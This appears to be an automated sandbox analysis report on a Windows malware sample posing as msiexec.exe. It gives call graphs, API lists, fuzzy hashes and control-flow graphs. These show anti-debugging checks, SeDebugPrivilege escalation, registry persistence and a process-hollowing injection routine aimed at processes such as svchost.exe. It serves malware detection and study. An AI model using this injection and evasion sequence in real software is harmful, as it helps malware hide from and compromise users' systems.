1369->1370 1371 7ff7f2d02fe0 1376 7ff7f2d02fe9 1371->1376 1372 7ff7f2d030d5 1375 7ff7f2d03b28 RegDeleteKeyW 1375->1376 1376->1372 1376->1375 1377 7ff7f2d03d28 9 API calls 1376->1377 1378 7ff7f2d038b8 2 API calls 1376->1378 1380 7ff7f2d044c8 CreateFileW 1376->1380 1385 7ff7f2d03a88 RegOpenKeyExW 1376->1385 1377->1376 1379 7ff7f2d030c5 Sleep 1378->1379 1379->1376 1381 7ff7f2d04523 1380->1381 1382 7ff7f2d0455e 1380->1382 1388 7ff7f2d04448 SetFilePointer WriteFile SetEndOfFile 1381->1388 1382->1376 1384 7ff7f2d0453f SetFileAttributesW CloseHandle 1384->1382 1386 7ff7f2d03b16 1385->1386 1387 7ff7f2d03adc RegSetValueExW 1385->1387 1386->1376 1387->1386 1388->1384 1389 7ff7f2d049bf 1392 7ff7f2d049cf 1389->1392 1390 7ff7f2d04b03 GetProcessHeap HeapFree CloseHandle 1391 7ff7f2d04b29 1390->1391 1392->1390 1393 7ff7f2d04a14 GetProcessHeap HeapAlloc 1392->1393 1394 7ff7f2d04a61 1392->1394 1393->1394 1394->1390

                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                                                                    callgraph 0 Function_00007FF7F2D02F70 28 Function_00007FF7F2D02E30 0->28 1 Function_00007FF7F2D032F0 2 Function_00007FF7F2D030F0 2->0 3 Function_00007FF7F2D035F0 4 Function_00007FF7F2D03B68 5 Function_00007FF7F2D04168 10 Function_00007FF7F2D03A58 5->10 30 Function_00007FF7F2D03A28 5->30 6 Function_00007FF7F2D03BE8 7 Function_00007FF7F2D03FE8 23 Function_00007FF7F2D02BFC 7->23 8 Function_00007FF7F2D03360 8->1 8->5 8->6 11 Function_00007FF7F2D03210 8->11 22 Function_00007FF7F2D03180 8->22 24 Function_00007FF7F2D03978 8->24 29 Function_00007FF7F2D042A8 8->29 34 Function_00007FF7F2D010A0 8->34 35 Function_00007FF7F2D03120 8->35 38 Function_00007FF7F2D03E18 8->38 9 Function_00007FF7F2D02FE0 19 Function_00007FF7F2D03A88 9->19 31 Function_00007FF7F2D03B28 9->31 32 Function_00007FF7F2D03D28 9->32 46 Function_00007FF7F2D044C8 9->46 54 Function_00007FF7F2D038B8 9->54 11->4 11->7 36 Function_00007FF7F2D01C20 11->36 47 Function_00007FF7F2D03FC8 11->47 48 Function_00007FF7F2D037C8 11->48 12 Function_00007FF7F2D03290 15 Function_00007FF7F2D01F8C 12->15 13 Function_00007FF7F2D0350D 14 Function_00007FF7F2D01F0C 15->14 43 Function_00007FF7F2D01ECC 15->43 45 Function_00007FF7F2D01F4C 15->45 16 Function_00007FF7F2D04808 25 Function_00007FF7F2D04578 16->25 37 Function_00007FF7F2D04798 16->37 17 Function_00007FF7F2D04308 17->10 18 Function_00007FF7F2D03F08 20 Function_00007FF7F2D01000 21 Function_00007FF7F2D03600 22->48 53 Function_00007FF7F2D043B8 22->53 44 Function_00007FF7F2D029CC 23->44 24->48 49 Function_00007FF7F2D03648 24->49 24->54 26 Function_00007FF7F2D032B0 26->15 27 Function_00007FF7F2D02DB0 27->16 27->48 33 Function_00007FF7F2D034A1 34->20 42 Function_00007FF7F2D01050 34->42 39 Function_00007FF7F2D03618 40 Function_00007FF7F2D032D0 40->15 41 Function_00007FF7F2D02ED0 41->4 41->7 41->36 41->47 52 Function_00007FF7F2D028BC 44->52 50 Function_00007FF7F2D04448 46->50 47->18 48->49 49->39 51 Function_00007FF7F2D049BF 51->25 51->37 53->17

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF7F2D03360 Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 217 7ff7f2d03360-7ff7f2d03376 call 7ff7f2d010a0 call 7ff7f2d03120 222 7ff7f2d03380-7ff7f2d033ae call 7ff7f2d04168 call 7ff7f2d03be8 call 7ff7f2d03e18 217->222 223 7ff7f2d03378-7ff7f2d0337a ExitProcess 217->223 230 7ff7f2d033b0-7ff7f2d033c1 call 7ff7f2d042a8 222->230 231 7ff7f2d033ff-7ff7f2d03412 call 7ff7f2d03e18 222->231 238 7ff7f2d033d6-7ff7f2d033d8 ExitProcess 230->238 239 7ff7f2d033c3-7ff7f2d033d4 call 7ff7f2d042a8 230->239 236 7ff7f2d03414-7ff7f2d03425 call 7ff7f2d042a8 231->236 237 7ff7f2d03450-7ff7f2d03463 call 7ff7f2d03e18 231->237 246 7ff7f2d0342f call 7ff7f2d03180 236->246 247 7ff7f2d03427-7ff7f2d03429 ExitProcess 236->247 249 7ff7f2d034a6-7ff7f2d034bc call 7ff7f2d03978 call 7ff7f2d032f0 237->249 250 7ff7f2d03465-7ff7f2d03476 call 7ff7f2d042a8 237->250 239->238 248 7ff7f2d033de call 7ff7f2d03210 239->248 255 7ff7f2d03434-7ff7f2d03439 246->255 257 7ff7f2d033e3-7ff7f2d033e8 248->257 269 7ff7f2d03512-7ff7f2d035d4 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 249->269 270 7ff7f2d034be-7ff7f2d034cf call 7ff7f2d042a8 249->270 264 7ff7f2d03480 call 7ff7f2d03180 250->264 265 7ff7f2d03478-7ff7f2d0347a ExitProcess 250->265 259 7ff7f2d0343b-7ff7f2d03446 Sleep 255->259 260 7ff7f2d03448-7ff7f2d0344a ExitProcess 255->260 262 7ff7f2d033ea-7ff7f2d033f5 Sleep 257->262 263 7ff7f2d033f7-7ff7f2d033f9 ExitProcess 257->263 259->255 262->257 268 7ff7f2d03485-7ff7f2d0348a 264->268 271 7ff7f2d0348c-7ff7f2d03497 Sleep 268->271 272 7ff7f2d03499-7ff7f2d0349b ExitProcess 268->272 275 7ff7f2d034e4-7ff7f2d034e6 ExitProcess 270->275 276 7ff7f2d034d1-7ff7f2d034e2 call 7ff7f2d042a8 270->276 271->268 276->275 279 7ff7f2d034ec call 7ff7f2d03210 276->279 281 7ff7f2d034f1-7ff7f2d034f6 279->281 282 7ff7f2d03505-7ff7f2d03507 ExitProcess 281->282 283 7ff7f2d034f8-7ff7f2d03503 Sleep 281->283 283->281
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                                                    • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_VznLpbPuTg$worker_VznLpbPuTg$worker_ZLpjbmHstE$worker_pPCJtqmKMc
                                                                                                                                                                                                                                                    • API String ID: 613740775-1274706621
                                                                                                                                                                                                                                                    • Opcode ID: 562c10440d2085f00e5188f01eda79b6919a797adb5fe31d750cc63d19ac4371
                                                                                                                                                                                                                                                    • Instruction ID: 4ad24db471cc2e9316003426a4f21ca908143884ad0c381283421c89fad25a02
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 562c10440d2085f00e5188f01eda79b6919a797adb5fe31d750cc63d19ac4371
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4261FC20A1C64392F7A4FB31A8552BEA260BF85305FD04535D56E8A1FDDEADE809C3B1
                                                                                                                                                                                                                                                    Function 00007FF7F2D04168 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 434396405-0
                                                                                                                                                                                                                                                    • Opcode ID: 5572af213e5128c0dc0009257d67e79a385e61fda350e8b67cdc156981955163
                                                                                                                                                                                                                                                    • Instruction ID: 0f668bc4a8fd75bfc6d4b7ee4ba4067e2c62d3688a9bdf4c4406bc3dbc17270b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5572af213e5128c0dc0009257d67e79a385e61fda350e8b67cdc156981955163
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F31E532A18A8186E750EB55E45072AB7A4FBC8780F505035FA9E47AB8DFBCD441CBA0
                                                                                                                                                                                                                                                    Function 00007FF7F2D03120 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3920101602-0
                                                                                                                                                                                                                                                    • Opcode ID: e9bd88260ec4cc61dc4a106c2a67c42b8d4857221eedeb8770e35a2a76d82c30
                                                                                                                                                                                                                                                    • Instruction ID: 90b698c85e48d60da67824814e9dc7e77bf2df58a648aff46b99f878423719cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9bd88260ec4cc61dc4a106c2a67c42b8d4857221eedeb8770e35a2a76d82c30
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55F0541090C28281F7B0EB55A40437A9790BB49B04F800178D5ED051E8CFACD919CBB2
                                                                                                                                                                                                                                                    Function 00007FF7F2D042A8 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4294037311-0
                                                                                                                                                                                                                                                    • Opcode ID: 7cb7a44c0d5384097fc9cae982f15e4040306c9a3300e2096f8f36d6c1bf3f53
                                                                                                                                                                                                                                                    • Instruction ID: 18ff53b1ced749fc1584b80a36fdee81d6ca08ae2e3a0869489c2f595822b94d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cb7a44c0d5384097fc9cae982f15e4040306c9a3300e2096f8f36d6c1bf3f53
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30F01C21A0C681C2EB20EB20A40476AA360FB9A300FD05474DAAE426ECCEADE445D6B1
                                                                                                                                                                                                                                                    Function 00007FF7F2D01050 Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 314 7ff7f2d01050-7ff7f2d0108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF7F2D01165,?,?,?,?,?,?,00007FF7F2D0336C), ref: 00007FF7F2D01063
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF7F2D01165,?,?,?,?,?,?,00007FF7F2D0336C), ref: 00007FF7F2D01078
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2574300362-0
                                                                                                                                                                                                                                                    • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                                                    • Instruction ID: 077f5af00781128a0b3e1df275a8446de36da8961b1f544a98497072b9d8882c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECE09276908F8096D620EB15F84001AB7B4FBC8794FA04225EACD42B38DF3CC165CB10
                                                                                                                                                                                                                                                    Function 00007FF7F2D03A28 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 315 7ff7f2d03a28-7ff7f2d03a37 316 7ff7f2d03a4c-7ff7f2d03a50 315->316 317 7ff7f2d03a39-7ff7f2d03a46 VirtualFree 315->317 317->316
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                    • Opcode ID: 8c163ca7f34193cc1aec9bafbbcdec196117a86198a0a8583c7d817857ed249e
                                                                                                                                                                                                                                                    • Instruction ID: dca30db50ab446789bf1d967c8a17c5498dc6766b39dc09fe66963e9962f2c01
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c163ca7f34193cc1aec9bafbbcdec196117a86198a0a8583c7d817857ed249e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5D01221E3994181F794EB27E889715A2A0FBC4B44F809035E68D415FCCF7CC499CF11

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00007FF7F2D01F8C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 318 7ff7f2d01f8c-7ff7f2d02006 GetModuleFileNameW 319 7ff7f2d0200d-7ff7f2d02049 318->319 320 7ff7f2d02008 318->320 322 7ff7f2d02061-7ff7f2d0207d call 7ff7f2d01ecc 319->322 323 7ff7f2d0204b-7ff7f2d02053 319->323 321 7ff7f2d028b1-7ff7f2d028b9 320->321 332 7ff7f2d020c0-7ff7f2d020ca 322->332 325 7ff7f2d02055-7ff7f2d0205d 323->325 326 7ff7f2d0207f-7ff7f2d0209b call 7ff7f2d01f0c 323->326 329 7ff7f2d0205f-7ff7f2d020bb 325->329 330 7ff7f2d0209d-7ff7f2d020b9 call 7ff7f2d01f4c 325->330 326->332 329->321 330->332 336 7ff7f2d020d1-7ff7f2d02125 CreateProcessW 332->336 337 7ff7f2d020cc 332->337 338 7ff7f2d0212c-7ff7f2d0216c CreateFileW 336->338 339 7ff7f2d02127 336->339 337->321 340 7ff7f2d02173-7ff7f2d0218f GetFileSize 338->340 341 7ff7f2d0216e 338->341 339->321 342 7ff7f2d02191-7ff7f2d02199 340->342 343 7ff7f2d0219b-7ff7f2d021a6 CloseHandle 340->343 341->321 342->343 344 7ff7f2d021ab-7ff7f2d021d3 VirtualAlloc 342->344 343->321 345 7ff7f2d021e5-7ff7f2d02210 ReadFile 344->345 346 7ff7f2d021d5-7ff7f2d021e0 CloseHandle 344->346 347 7ff7f2d02235-7ff7f2d02283 CloseHandle GetThreadContext 345->347 348 7ff7f2d02212-7ff7f2d02230 VirtualFree CloseHandle 345->348 346->321 349 7ff7f2d02285-7ff7f2d02298 VirtualFree 347->349 350 7ff7f2d0229d-7ff7f2d02322 ReadProcessMemory GetModuleHandleA GetProcAddress 347->350 348->321 349->321 352 7ff7f2d02324-7ff7f2d02337 VirtualFree 350->352 353 7ff7f2d0233c-7ff7f2d023a5 VirtualAllocEx 350->353 352->321 354 7ff7f2d023bf-7ff7f2d023f3 WriteProcessMemory 353->354 355 7ff7f2d023a7-7ff7f2d023ba VirtualFree 353->355 356 7ff7f2d023f5-7ff7f2d02408 VirtualFree 354->356 357 7ff7f2d0240d-7ff7f2d02418 354->357 355->321 356->321 358 7ff7f2d0242a-7ff7f2d0243d 357->358 359 7ff7f2d02443-7ff7f2d024cc WriteProcessMemory 358->359 360 7ff7f2d024eb-7ff7f2d02532 358->360 361 7ff7f2d024e6 359->361 362 7ff7f2d024ce-7ff7f2d024e1 VirtualFree 359->362 363 7ff7f2d02544-7ff7f2d02557 360->363 361->358 362->321 365 7ff7f2d0255d-7ff7f2d025ac RtlCompareMemory 363->365 366 7ff7f2d027dc-7ff7f2d02860 WriteProcessMemory SetThreadContext 363->366 367 7ff7f2d025b0-7ff7f2d025d9 365->367 368 7ff7f2d025ae 365->368 369 7ff7f2d02862-7ff7f2d02875 VirtualFree 366->369 370 7ff7f2d02877-7ff7f2d02887 ResumeThread 366->370 372 7ff7f2d025e4-7ff7f2d025f2 367->372 368->363 369->321 373 7ff7f2d0289e-7ff7f2d028ab VirtualFree 370->373 374 7ff7f2d02889-7ff7f2d0289c VirtualFree 370->374 375 7ff7f2d025f8-7ff7f2d02683 372->375 376 7ff7f2d027d7 372->376 373->321 374->321 377 7ff7f2d02695-7ff7f2d026a3 375->377 376->366 378 7ff7f2d027d2 377->378 379 7ff7f2d026a9-7ff7f2d026dc 377->379 378->372 380 7ff7f2d026e0-7ff7f2d027b3 ReadProcessMemory WriteProcessMemory 379->380 381 7ff7f2d026de 379->381 383 7ff7f2d027b5-7ff7f2d027c8 VirtualFree 380->383 384 7ff7f2d027cd 380->384 381->377 383->321 384->378
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                                                                                                    • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                                    • API String ID: 514040917-3001742581
                                                                                                                                                                                                                                                    • Opcode ID: f917b2b91664f8174983d74143afff0df1ca4cc990d6240a450e42c88ea1ecf1
                                                                                                                                                                                                                                                    • Instruction ID: 7da784bbddf8ddb8362a69bc2f928102ebc82cbd57015f772d13bf68047acaaf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f917b2b91664f8174983d74143afff0df1ca4cc990d6240a450e42c88ea1ecf1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6532083260DAC186E770DB15E8587AAB7A0FB88744F804135DA9D87BACDF7CD444CBA1
                                                                                                                                                                                                                                                    Function 00007FF7F2D03FE8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                    • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                                                    • Opcode ID: 94645651470d070a51f1cdb170c7734c28d4b19bea71717cc88f8f06bffa0438
                                                                                                                                                                                                                                                    • Instruction ID: 7441f68425843807ed3a088ad546239e07845cb4e3a2062fbf0e1fd14889101b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94645651470d070a51f1cdb170c7734c28d4b19bea71717cc88f8f06bffa0438
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90413832518A8186F750EB11F44876AF7A0FBC4794F904135EAA947AECCFBDD448CBA1
                                                                                                                                                                                                                                                    Function 00007FF7F2D02BFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: a0d1b69305b19612fe7fc462b48fcf683c387df21fe0cb8043b32751d69db5ac
                                                                                                                                                                                                                                                    • Instruction ID: adcad25ede71cb22dd5f2407dab7deb027617e76834e9ffb1a08098d157f4ed8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0d1b69305b19612fe7fc462b48fcf683c387df21fe0cb8043b32751d69db5ac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D41D432609A8186E770DB15E44876ABBA0F784784F504039EADD87BA8DFBDD444CBA0
                                                                                                                                                                                                                                                    Function 00007FF7F2D01C20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
